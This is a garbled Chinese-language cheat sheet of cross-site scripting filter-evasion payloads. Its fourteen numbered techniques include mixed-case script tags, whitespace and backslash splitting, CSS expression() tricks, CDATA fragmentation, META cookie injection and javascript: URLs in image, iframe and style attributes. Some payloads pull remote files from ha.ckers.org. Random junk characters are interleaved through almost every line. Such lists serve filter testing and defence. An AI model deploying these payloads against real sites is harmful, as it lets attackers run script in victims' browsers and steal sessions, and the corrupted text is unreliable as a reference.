1. 改变字符大小写/ y6 A7 h: h1 S* T4 E
& b) k( A4 f. D! ?- c+ d( H; X
+ B' R+ `0 H) i! T
, [5 V. D+ k+ q/ H& P7 @ <sCript>alert(‘d’)</scRipT>3 R) E) s- G* e' Y
. j! _% n+ m5 w
2. 利用多加一些其它字符来规避Regular Expression的检查3 W5 d8 M% y- J+ g e
2 V2 R( g2 {. ~0 @8 [: h <<script>alert(‘c’)//<</script>
1 @; I% @: [: f
! O. ]7 S; j o9 N" [: m, k <SCRIPT a=">" SRC="t.js"></SCRIPT>2 `% b: H5 ?, n$ K q
0 Z4 `% a3 @$ z% F7 q
<SCRIPT =">" SRC="t.js"></SCRIPT>
7 R5 ]( d# D* C3 d6 L* d; B5 G# h
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>
( g! o7 x/ L! p( o* x1 {
' ~% z4 P+ E- u9 { <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
4 ` L: I$ \! ^ H3 O5 V+ S; K
" _. r8 x2 j3 g( @ <SCRIPT a=`>` SRC="t.js"></SCRIPT>
2 Z5 k8 O# l/ c. a) V+ d7 K2 Y; ]3 i2 y' W5 Q4 A2 T7 O
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>8 h: e& r! e% R
2 q5 m) z2 f( F _* A' f
3. 以其它扩展名取代.js6 @8 `5 y0 L, J% ?) `
4 Q: a$ s5 g( L* T
<script src="bad.jpg"></script>. d5 l' j* |: M/ `& @0 ]2 A
' }* f+ F- R4 O# y' [4. 将Javascript写在CSS档里
. X- F8 I1 [( v- T4 K; m
/ I7 ~% ?6 L- r0 R) ~* f! | <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
; ]! Q8 O/ a: A' D
$ ^' C( j, v" C! N: E: ? example:4 X, M+ x0 m5 l5 ?0 s; g( s) C
' ^+ o' Q* a2 n9 w0 j/ q) J7 i, v
body {
6 E, L3 P6 Y, R v9 e1 [ V% z: @+ e
background-image: url(‘javascript:alert("XSS");’)
% U8 ^/ A% d3 C& o0 J( n, Q; m" `/ s ^2 r% ]) ]6 X' e: \; u
}' ]: v. h/ E, {$ I+ b Q# q* s
: g8 E; |6 D$ ~0 D# r3 [9 \6 q
5. 在script的tag里加入一些其它字符
0 j5 k+ ^/ ~7 t+ y: h3 V. R1 N2 C+ s" Q! m' A9 Y) V, p
<SCRIPT/SRC="t.js"></SCRIPT>
E& @. C. ?/ e' X, y' g
2 s) h. Q( ^3 f2 `: U <SCRIPT/anyword SRC="t.js"></SCRIPT>
& l j, c6 S: D. @ L& L' ?
1 k2 b9 d, W3 u- s* u' R5 R6. 使用tab或是new line来规避$ w5 }2 {7 K5 C0 w
) r; N9 _0 T' m: [- i <img src="jav ascr ipt:alert(‘XSS3′)">3 b% Z: t7 q S2 M0 R7 k2 d
2 y3 \- `9 u3 Q6 E6 _
<img src="jav ascr ipt:alert(‘XSS3′)">
# n+ U# b: L; K( Z4 T' ]) F# h- a2 {5 l6 L7 c' Z2 e, m
<IMG SRC="jav ascript:alert(‘XSS’);">
: a: h0 B% S: m& o! i' f* i9 ^8 k
-> tag
H. K0 s$ S) r# c5 H: v9 l1 d3 P% h, b1 N
-> new line3 p# W- l+ \% z* M
! ?, X2 N E# ]# h7. 使用"\"来规避( N0 P' m' b, I, ^+ i& g
1 T& C2 ~3 u5 d5 c# K& p! K. I <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
! {- ] |4 e+ j) N# [+ A8 O/ y: ^' N! q+ p1 n
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>1 Q7 g( y" F6 O* z* [. t
/ D3 O J. b" R
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
# R) i+ f7 g! @
6 l, e# @: v. h/ U4 ? <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
6 x7 v% V J1 h. [; K1 X$ l# c, A3 z. L& h8 F: U7 d
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>* G9 V9 g- B7 K* m( f- i L
2 p' c* D0 s" K1 ? R" O
8. 使用Hex encode来规避(也可能会把";"拿掉)7 M0 r( H0 B: A% B; b
" R5 F) a4 R" P6 ?; k3 W: y% z( I7 y. M <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
6 T+ ], _# [7 ]' p% F# B; ]$ i# l8 p, k- U2 ?& G
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">& J" ]! L: Z5 v& P+ j
, k, l1 }+ h- h' J5 M7 p9 }: u <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);"># d" X0 z7 L( e2 f
, ^3 z$ }0 e6 I9 b) r 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">( i0 u3 q7 M0 ]7 H: N8 P- h- o9 m
9 {' g! n! j" N# T$ A" r! z9. script in HTML tag6 j. m R/ r8 [& A/ Y
* i' f$ o: I% x" g3 z
<body onload=」alert(‘onload’)」>/ F D* ?3 d; K5 n( B+ G
F$ _, }+ h: f& N6 \& F5 C6 ?
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload, R1 I: O Y9 i5 L
( t) }# K& S. B k& Z+ \8 f+ h
10. 在swf里含有xss的code: w8 K- N: s( I% y$ `
5 r" s0 t# M! o
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
! }, x* u+ Y4 d: B5 e- `6 c8 j0 a% U$ O+ j, c3 @7 N
11. 利用CDATA将xss的code拆开,再组合起来。
& i) Q0 p6 s; R
0 d* Z; g( m# I2 E+ X <XML ID=I><X><C>
& [2 z0 j: u. M! d P6 c- K
9 L4 ~3 P$ ^+ H <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
. _) S& a* _9 d
! Q2 M! z3 ~4 T4 |, q </C></X>2 A2 p5 @# r2 }8 w% d% n) e; z* c0 _
3 v+ K; y) {" C- P9 q7 P: [# \1 L </xml>! o# a8 Q Y# a x8 d0 K
1 L4 T3 m3 s6 A3 g <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
; V0 x; q% l* r% V; k! C% r: e
! E) I, X& U! |( m; q <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
2 Q. P3 F' P6 y, T7 j$ `
+ H) |, C6 T- l$ e4 [6 h2 [ <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
0 O; [& H* f) z! a* G9 s" T( E9 J/ \: H8 q
12. 利用HTML+TIME。
8 S* D/ i& v' [$ j
0 f; X" [' c- A( Q; O0 c2 }! L3 Q <HTML><BODY>% k/ p, g2 ^9 l! m
* Q& Z8 w# M$ `+ M) A J
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">( u T7 i- x0 Y0 f6 M
- q" j* n( a0 d
<?import namespace="t" implementation="#default#time2">/ }# @' K$ n9 W/ z6 t3 p9 \$ y$ @
8 h- c5 A+ W4 p5 }: `. E6 a4 n' [ <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">& ^/ L C% D" n7 d. {' B7 k
+ o* [! k0 c7 [4 v/ f </BODY></HTML>* C+ @2 X7 l& l# d$ N1 y1 M
' C% H6 n. m4 _3 G
13. 透过META写入Cookie。, H% B3 e% P h* a0 {
& O, I3 r- I2 l <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>"> ~/ g: W3 k: z) z2 g5 j; h
) i6 a2 s- P5 ^& F4 X } l14. javascript in src , href , url
. m8 V1 F; R% l. n* k9 r C5 }: T
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
* k2 D1 L' F* W6 J9 y: ]; f1 H
" y1 A; D* }* y: e$ u' Z <img src="javascript:alert(‘XSS3′)">
+ ~2 k5 ~. G! k, h
. ^( c' s! ^* D& w$ a6 J9 u% ~2 o<IMG DYNSRC="javascript:alert(‘XSS20′)">
2 S( S+ j; Y$ ?0 {, Y# D/ Z& B( c; Q }& D3 K5 P( `
<IMG LOWSRC="javascript:alert(‘XSS21′)">
) V9 X( I9 _. p( r4 |& s. V
) g. @6 j3 |2 z <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
9 \+ z# w# {* W; x
1 A6 C& B# O+ n3 Y! K( f0 g <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
2 U% T2 i, r) y. v/ f) W" g* @4 v' o- \& y- m1 _: y" G
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
: B: V5 U' G: F! y4 {3 q: ?; Q3 s
* S. T; X( M t8 m C/ a" ^ <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">. j3 [ \% }; T* C6 P5 }! w) Y
$ ]; y3 t2 M/ Q$ U( w
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}: R9 R1 ]* @: A6 s0 X
2 v& e3 Y! l$ q5 J! L1 l
</STYLE><A CLASS=XSS></A>- l/ S9 B- F8 k0 a' t
' t$ ^5 k" n6 [' s <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>% N# Z' ^# @& N2 U
$ \* _; g" |$ ?( \1 ]( [& J |